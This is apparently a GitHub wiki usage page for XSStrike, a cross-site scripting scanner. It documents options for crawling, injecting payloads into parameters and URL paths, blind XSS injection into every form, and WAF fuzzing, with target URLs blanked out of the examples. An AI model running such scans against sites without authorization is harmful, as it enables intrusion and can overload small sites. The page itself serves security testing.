Skip to content
Somdev Sangwan edited this page Apr 12, 2019 · 24 revisions
usage: [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
                   [--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
                   [--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]

optional arguments:
  -h, --help            show this help message and exit
  -u, --url             target url
  --data                post data
  -f, --file            load payloads from a file
  -t, --threads         number of threads
  -l, --level           level of crawling
  -t, --encode          payload encoding
  --json                treat post data as json
  --path                inject payloads in the path
  --seeds               load urls from a file as seeds
  --fuzzer              fuzzer
  --update              update
  --timeout             timeout
  --params              find params
  --crawl               crawl
  --proxy               use prox(y|ies)
  --blind               inject blind xss payloads while crawling
  --skip                skip confirmation dialogue and poc
  --skip-dom            skip dom checking
  --headers             add headers
  -d, --delay           delay between requests

Scan a single URL

Option: -u or --url

Test a single webpage which uses GET method.

python -u ""

Supplying POST data

python -u "" --data "q=query"

Testing URL path components

Option: --path

Want to inject payloads in the URL path like<payload>, you can do that with --path switch.

python -u "" --path

Treat POST data as JSON

Option: --json

This switch can be used to test JSON data via POST method.

python -u "" --data '{"q":"query"} --json'


Option: --crawl

Start crawling from the target webpage for targets and test them.

python -u "" --crawl

Crawling depth

Option: -l or --level | Default: 2

This option let's you specify the depth of crawling.

python -u "" --crawl -l 3

Testing/Crawling URLs from a file

Option: --seeds

If you want to test URLs from a file or just simply want to add seeds for crawling, you can use the --seeds option.

python --seeds urls.txt


python -u "" -l 3 --seeds urls.txt

Bruteforce payloads from a file

Option: -f or --file

You can load payloads from a file and check if they work. XSStrike will not perform any analysis in this mode.

python3 -u "" -f /path/to/file.txt

Using default as file path with load XSStrike's default payloads.

Find hidden parameters

Option: --params

Find hidden parameters by parsing HTML & bruteforcing.

python -u "" --params

Number of threads

Option: -t or --threads | Default: 2

It is possible to make concurrent requests to the target while crawling and -t option can be used to specify the number of concurrent requests to make. While threads can help to speed up crawling, they might also trigger security mechanisms. A high number of threads can also bring down small websites.

python -u "" -t 10 --crawl -l 3


Option: --timeout | Default: 7

It is possible to specify a number of seconds to wait before considering the HTTP(S) request timed out.

python -u "" --timeout=4


Option: -d or --delay | Default: 0

It is possible to specify a number of seconds to hold between each HTTP(S) request. The valid value is a int, for instance 1 means a second.

python -u "" -d 2

Supply HTTP headers

Option: --headers

This option will open your text editor (default is 'nano') and you can simply paste your HTTP headers and press Ctrl + S to save.

headers demo

If your operating system doesn't support this or you don't want to do this anyway, you can simply add headers from command line separated by \n as follows: python -u --headers "Accept-Language: en-US\nCookie: null"

Blind XSS

Option: --blind

Using this option while crawling will make XSStrike inject your blind XSS payload defined in core/ to be injected to every parameter of every HTML form.

python -u --crawl --blind

Payload Encoding

Option: -e or --encode

XSStrike can encode payloads on demand. Following encodings are supported as of now:

  • base64

python -u "" -e base64

Want an encoding to be supported? Open an issue.


Option: --fuzzer

The fuzzer is meant to test filters and Web Application Firewalls. It is painfully slow because it sends randomly* delay requests and the delay can be up to 30 seconds. To minimize the delay, set the delay to 1 second by using the -d option.

python -u "" --fuzzer


Option: --console-log-level | Default: INFO

It is possible to choose a minimum logging level to display xsstrike logs in the console: python -u "" --console-log-level WARNING

Option: --file-log-level | Default: None

If specified, xsstrike will also write all logs with equal logging level or higher to a file: python -u "" --console-log-level DEBUG

Option: --log-file | Default: xsstrike.log

Name of the file where logs will be stored. Note that if --file-log-levelis not specified, this option will not have any effect. python -u "" --file-log-level INFO --log-file output.log

Using Proxies

Option: --proxy | Default

You have to set up your prox(y|ies) in core/ and then you can use the --proxy switch to use them whenever you want.
More information on setting up proxies can be found here.

python -u "" --proxy

Skip Confirmation Prompt

Option: --skip

If you want XSStrike to continue the scan if a working payload found without asking you if you want to continue scanning then you can use this option. It will skip POC generation as well.

python -u "" --skip

Skip DOM Scanning

Option: --skip-dom

You may want to skip DOM XSS scanning while crawling to save you time.

python -u "" --skip-dom


Option: --update

If this option is enabled, XSStrike will check for updates. If a newer version will available, XSStrike will download and merge the updates into the current directory without overwriting other files.

python --update

You can’t perform that action at this time.